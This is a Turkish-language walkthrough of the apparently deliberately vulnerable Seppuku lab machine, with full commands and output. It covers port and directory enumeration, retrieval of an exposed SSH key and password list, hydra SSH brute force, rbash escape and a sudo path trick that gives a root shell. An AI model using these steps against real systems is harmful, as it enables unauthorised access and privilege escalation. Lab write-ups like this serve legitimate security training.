      ####Enumeration

Nmap
Tüm TCP bağlantı noktalarına karşı bir tarama çalıştırarak başlıyoruz :
kali@kali:~$ sudo nmap -p- $targetip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-31 10:27 EDT
Nmap scan report for $targetip
Host is up (0.033s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
7080/tcp open  empowerid
7601/tcp open  unknown
8088/tcp open  radan-http
Keşfedilen açık bağlantı noktaları için, bu hizmetleri daha fazla sıralamak için agresif bir nmap taraması gerçekleştireceğiz:
kali@kali:~$ sudo nmap -p 21,22,80,139,445,7080,7601,8088 -A $targetip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-31 12:29 EDT
Nmap scan report for $targetip
Host is up (0.031s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title:  404 Not Found
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_ssl-date: 2020-08-31T16:30:25+00:00; 0s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 2h00m00s, median: 0s
|_nbstat: NetBIOS name: SEPPUKU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2020-08-31T12:30:22-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-31T16:30:21
|_  start_date: N/A
Bu taramadan, 7601 numaralı bağlantı noktasında bir Apache web sunucusunun çalıştığını görüyoruz:
...
7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
...

      ####Dirb
Dirb Aracı, bu sitenin dizinlerini kaba kuvvet uygulamak için varsayılan kelime listesi ve özyinelemeli olmayan seçenekle kullanabiliriz :
kali@kali:~$ dirb http://$targetip:7601/ -r
...
---- Scanning URL: http://$targetip:7601/ ----
==> DIRECTORY: http://$targetip:7601/a/
==> DIRECTORY: http://$targetip:7601/b/
==> DIRECTORY: http://$targetip:7601/c/
==> DIRECTORY: http://$targetip:7601/ckeditor/
==> DIRECTORY: http://$targetip:7601/d/
==> DIRECTORY: http://$targetip:7601/database/
==> DIRECTORY: http://$targetip:7601/e/
==> DIRECTORY: http://$targetip:7601/f/
==> DIRECTORY: http://$targetip:7601/h/
+ http://$targetip:7601/index.html (CODE:200|SIZE:171)
==> DIRECTORY: http://$targetip:7601/keys/
==> DIRECTORY: http://$targetip:7601/production/
==> DIRECTORY: http://$targetip:7601/q/
==> DIRECTORY: http://$targetip:7601/r/
==> DIRECTORY: http://$targetip:7601/secret/
+ http://$targetip:7601/server-status (CODE:403|SIZE:282)
==> DIRECTORY: http://$targetip:7601/t/
==> DIRECTORY: http://$targetip:7601/w/
...
Taramadan iki ilgi alanı belirlenir: /keys ve /secret

      ####Web Enumeration
/keys dizininin (http://$targetip:7601/keys/) içinde private adlı bir dosya görüyoruz :
kali@kali:~$ curl http://$targetip:7601/keys/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
...
</td><td><a href="private">private</a></td><td align="right">2020-05-13 05:28  </td><td align="right">1.6K</td><td>&nbsp;</td>
...
Bu dosyanın içeriğini indirip inceleyeceğiz:
kali@kali:~$ wget http://$targetip:7601/keys/private
--2020-08-31 12:45:31--  http://$targetip:7601/keys/private
Connecting to $targetip:7601... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1680 (1.6K)
Saving to: ‘private’

private                         100%[====================================================>]   1.64K  --.-KB/s    in 0s      

2020-08-31 12:45:31 (224 MB/s) - ‘private’ saved [1680/1680]
kali@kali:~$ 
kali@kali:~$ cat private 
-----BEGIN RSA PRIVATE KEY-----
$CENSORED PRIVATE KEY!!!
-----END RSA PRIVATE KEY-----

Bir kullanıcı için özel bir SSH anahtarı bulduk; ancak henüz hangi kullanıcıya ait olduğunu bilmiyoruz. Daha fazlasını öğrenene kadar bunu bir kenara koyacağız.
/secret dizini içinde (http://$targetip:7601/secret/), ilgilenilen iki dosya buluyoruz: hostname ve password.lst :

kali@kali:~$ curl http://$targetip:7601/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
...
</td><td><a href="hostname">hostname</a></td><td align="right">2020-05-13 03:41  </td><td align="right">  8 </td><td>&nbsp;</td>
...
</td><td><a href="password.lst">password.lst</a></td><td align="right">2020-05-13 03:59  </td><td align="right">672 </td><td>&nbsp;</td>
...

Daha fazla inceleme için her iki dosyayı da indireceğiz:
kali@kali:~$ wget http://$targetip:7601/secret/hostname
--2020-08-31 12:51:40--  http://$targetip:7601/secret/hostname
Connecting to $targetip:7601... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8
Saving to: ‘hostname’

hostname                        100%[====================================================>]       8  --.-KB/s    in 0s      

2020-08-31 12:51:40 (1.14 MB/s) - ‘hostname’ saved [8/8]
kali@kali:~$ 
kali@kali:~$ wget http://$targetip:7601/secret/password.lst
--2020-08-31 10:44:03--  http://$targetip:7601/secret/password.lst
Connecting to $targetip:7601... connected.
HTTP request sent, awaiting response... 200 OK
Length: 672
Saving to: ‘password.lst’

password.lst                    100%[====================================================>]     672  --.-KB/s    in 0s      

2020-08-31 10:44:03 (84.6 MB/s) - ‘password.lst’ saved [672/672]

      ####Exploitation

SSH Bruteforce
Ana bilgisayar adı dosyasının içine baktığımızda aşağıdakileri görüyoruz:
kali@kali:~$ cat hostname 
seppuku
password.lst dosyasını incelemek , bunun özel bir parola sözcük listesi olduğunu gösterir:
kali@kali:~$ head password.lst 
$censoredpassword.lst
seppuku Sistemde bir kullanıcı olabilecek eğitimli bir tahminde bulunabiliriz. Keşfedilen kelime listesini kullanarak, aşağıdaki gibi bir araç kullanarak bu kullanıcının SSH kimlik bilgilerini kaba kuvvetle çalıştırmayı deneyebiliriz hydra:
kali@kali:~$ hydra -l seppuku -P password.lst $targetip ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak
...
[DATA] attacking ssh://$targetip:22/
[22][ssh] host: $targetip   login: seppuku   password: $censoredpassword
1 of 1 target successfully completed, 1 valid password found
...
Saldırı başarılı görünüyor ve hydra geçerli bir kimlik bilgisi çifti buluyor seppuku:$censoredpassword. SSH üzerinden hedefe bağlanarak bunu doğrulayabiliriz:
kali@kali:~$ ssh seppuku@$targetip
seppuku@$targetip's password: 
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
...
seppuku@seppuku:~$ id
uid=1000(seppuku) gid=1000(seppuku) groups=1000(seppuku),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
seppuku@seppuku:~$

      ####Kısıtlı Shell'den Kaçmak
Kullanıcının ana dizinine baktığımızda, .passwd dosyasını görüyoruz :
seppuku@seppuku:~$ ls -la
total 28
drwxr-xr-x 3 seppuku seppuku 4096 Jul  8 06:30 .
drwxr-xr-x 5 root    root    4096 May 13 04:50 ..
-rw-r--r-- 1 seppuku seppuku  220 May 13 00:28 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3526 May 13 00:28 .bashrc
drwx------ 3 seppuku seppuku 4096 May 13 10:05 .gnupg
-rw-r--r-- 1 root    root      20 May 13 04:47 .passwd
-rw-r--r-- 1 seppuku seppuku  807 May 13 00:28 .profile
seppuku@seppuku:~$
İçeriye bakıldığında şunları gösterir:
seppuku@seppuku:~$ cat .passwd 
$censored.passwdfile
seppuku@seppuku:~$
Parolaya benzeyen şeyi buluyoruz, ancak henüz kimin veya ne için olduğunu bilmiyoruz. /home içindeki kullanıcı ev dizinlerini listelerken, iki kullanıcı daha görüyoruz: samurai ve tanto:
seppuku@seppuku:~$ ls -la /home
total 20
drwxr-xr-x  5 root    root    4096 May 13 04:50 .
drwxr-xr-x 18 root    root    4096 Jul  7 23:08 ..
drwxr-xr-x  3 samurai samurai 4096 Jul  8 06:30 samurai
drwxr-xr-x  3 seppuku seppuku 4096 Jul  8 06:30 seppuku
drwxr-xr-x  5 tanto   tanto   4096 Jul  8 06:30 tanto
seppuku@seppuku:~$
Ancak, dizinleri değiştirmeye çalışırsak, kısıtlı bir kabukta olduğumuz açıktır:
seppuku@seppuku:~$ cd /home
-rbash: cd: restricted
seppuku@seppuku:~$
/etc/passwd dosyasının görüntülenmesi şunu doğrular:
seppuku@seppuku:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
seppuku:x:1000:1000:seppuku,,,:/home/seppuku:/bin/rbash
...
samurai:x:1001:1002:,,,:/home/samurai:/bin/rbash
tanto:x:1002:1003:,,,:/home/tanto:/bin/rbash
seppuku@seppuku:~$
Ayrıca, hem kullanıcılar samurai hem tanto'de varsayılan kabukları rbash. Bunu bilerek, bu SSH kabuğundan çıkıp bayrakla yeniden bağlantı kurabiliriz -t "bash --noprofile":
seppuku@seppuku:~$ exit
logout
-rbash: /usr/bin/clear_console: restricted: cannot specify `/' in command names
Connection to $targetip closed.
kali@kali:~$ 
kali@kali:~$ ssh seppuku@$targetip -t "bash --noprofile"
seppuku@$targetip's password: 
seppuku@seppuku:~$
Artık kısıtlı bash ortamının dışındayız:
seppuku@seppuku:~$ cd /home
seppuku@seppuku:/home$ ls
samurai  seppuku  tanto
seppuku@seppuku:/home$

      ####Kullanıcı Değiştirme
/home/seppuku/.passwd içinde bulunan şifrenin bu iki kullanıcıdan birine ait olabileceğini tahmin edebiliriz. Her ikisi için de şifreyi deneyerek, samurai kullanıcısı ile başarılı oluyoruz :
seppuku@seppuku:/home$ cat seppuku/.passwd 
$censored.passwd
seppuku@seppuku:/home$ su samurai
Password: 
samurai@seppuku:/home$ id
uid=1001(samurai) gid=1002(samurai) groups=1002(samurai)
Root olarak çalıştırabileceğimiz herhangi bir program olup olmadığını kontrol ederek bir tane buluyoruz:
samurai@seppuku:/home$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
Ancak, bu ikili dosya hakkında herhangi bir bilgi bulamıyoruz çünkü hatırlayacak olursak, bu üç kullanıcının varsayılan kabuğu şu şekildedir rbash:
samurai@seppuku:/home$ cd tanto/
rbash: cd: restricted
samurai@seppuku:/home$

      ####Özel Anahtar Kullanan SSH
Henüz incelemediğimiz bir kullanıcımız daha var. Hedef sistemdeki kullanıcıları sıraladıktan sonra, web sunucusunda özel bir SSH anahtarı keşfettiğimizi hatırlayın.
tanto Özel anahtarı kullanan ve kısıtlı kabuktan kaçan kullanıcı olarak SSH için kullanmayı deneyebiliriz :
kali@kali:~$ chmod 600 private
kali@kali:~$ ssh -i private tanto@$targetip -t "bash --noprofile"
tanto@seppuku:~$ id
uid=1002(tanto) gid=1003(tanto) groups=1003(tanto)
tanto@seppuku:~$
Ancak, kullanıcının ana dizininin içine baktığımızda, /home/tanto/.cgi_bin/ dizinini görmüyoruz :
tanto@seppuku:~$ ls -la
total 36
drwxr-xr-x 5 tanto tanto 4096 Aug 31 14:09 .
drwxr-xr-x 5 root  root  4096 May 13 04:50 ..
-rw------- 1 tanto tanto    5 Aug 31 14:09 .bash_history
-rw-r--r-- 1 tanto tanto  220 May 13 04:50 .bash_logout
-rw-r--r-- 1 tanto tanto 3526 May 13 04:50 .bashrc
drwx------ 3 tanto tanto 4096 May 13 05:27 .gnupg
drwxr-xr-x 3 tanto tanto 4096 May 13 05:23 .local
-rw-r--r-- 1 tanto tanto  807 May 13 04:50 .profile
drwxr-xr-x 2 tanto tanto 4096 May 13 05:26 .ssh
tanto@seppuku:~$
Ancak, ana dizinimizde olması gerektiği için, .cgi_bin/ dosyasını bin dosyasıyla birlikte isteğe bağlı içerik yerleştirebileceğimiz .cgi_bin/ oluşturabiliriz.

      ####Privilege Escalation to Root
Gerekli dizini oluşturacağız ve ardından /bin/bash kabuğunu bin dosyasının içine yerleştireceğiz ve ona yürütülebilir izinler vereceğiz:
tanto@seppuku:~$ mkdir .cgi_bin
tanto@seppuku:~$ echo "/bin/bash" > .cgi_bin/bin
tanto@seppuku:~$ chmod 777 .cgi_bin/bin
tanto@seppuku:~$
Şimdi, /home/tanto/.cgi_bin/bin'i root ayrıcalıklarıyla yürütmek ve yükseltilmiş bir kabuk elde etmek için samurai kullanıcısı olarak bir kez daha oturum açacağız:$passwordcensored
tanto@seppuku:~$ su samurai
Password: 
samurai@seppuku:/home/tanto$ whoami
samurai
samurai@seppuku:/home/tanto$ sudo ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*
root@seppuku:/home/tanto# whoami
root
root@seppuku:/home/tanto#
